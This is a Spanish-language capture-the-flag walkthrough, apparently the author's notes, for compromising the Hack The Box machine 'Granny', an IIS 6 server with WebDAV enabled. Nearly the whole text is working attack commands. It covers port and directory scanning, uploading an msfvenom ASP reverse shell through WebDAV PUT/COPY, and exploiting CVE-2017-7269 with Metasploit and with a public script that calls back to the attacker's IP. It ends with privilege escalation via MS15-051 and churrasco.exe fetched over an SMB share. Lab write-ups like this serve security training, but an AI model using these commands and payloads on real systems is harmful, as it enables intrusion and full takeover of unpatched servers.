echo "10.129.150.175 granny.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.150.175 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210512133014.png

nmap -sC -sV -O -p- -oA granny 10.129.150.175

nmap -sU -O -p- -oA granny-udp 10.129.150.175

nikto -h 10.129.150.175:80

Pasted image 20210512134142.png

gobuster dir -k -u http://10.129.150.175/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210512133618.png

Pasted image 20210512133410.png

Vemos que en los metodos de http esta PUT

usamos davtest https://github.com/cldrn/davtest


perl davtest.pl -url http://granny.htb -move -copy -cleanup

Pasted image 20210512135453.png

Al ejecutar el comando anterior podemos llegar a la conclusion que si subimos un archivo de tipo .txt y hacemos un copy lo que llega a convertirse en una extension .asp y el servidor lo corre como un archivo asp


msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=9999 -f asp > granny_shell.asp.txt

Pasted image 20210512135957.png


$ cadaver http://granny.htb/ 
dav:/> put granny_shell.asp.txt
dav:/> copy granny_shell.asp.txt granny_shell.asp;.txt

Pasted image 20210512140259.png

rlwrap nc -lvnp 9999

curl http://granny.htb/granny_shell.asp;.txt

Este reverse shell dura como 2 segundos y no me sirve

Pasted image 20210512173454.png

Pasted image 20210512173535.png

Pasted image 20210512173617.png

Pasted image 20210512173724.png

meterpreter> background msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1 msf6 post(multi/recon/local_exploit_suggester) > run msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST tun0 msf6 exploit(windows/local/ms15_051_client_copy_image) > exploit msf6 exploit(windows/local/ms15_051_client_copy_image) > sessions -i 1 meterpreter > ps meterpreter > migrate 1816 meterpreter > background msf6 exploit(windows/local/ms15_051_client_copy_image) > exploit meterpreter > getuid

Para hacerlo estilo oscp sin metasploit. Nos clonamos esto en tu maquina kali:

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

Pasted image 20211227094721.png

python iis\reverse\shell 10.129.178.6 80 10.10.14.135 443

nc -lvnp 443

Pasted image 20211227094810.png

cd %temp%

mkdir privesc

cd privesc

systeminfo

Pasted image 20211227094857.png

Bajamos churrasco.exe de esta pagina

https://binaryregion.wordpress.com/2021/08/04/privilege-escalation-windows-churrasco-exe/

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smb2support

copy \\10.10.xx.xx\smbFolder\churrasco.exe churrasco.exe

Pasted image 20211227095947.png

churrasco.exe "type C:\DOCUME~1\Lakis\Desktop\user.txt"

Pasted image 20211227102629.png

churrasco.exe "type C:\DOCUME~1\Administrator\Desktop\root.txt"

Pasted image 20211227102703.png

boxes

copyright©2022 Cu3rv0x all rights reserved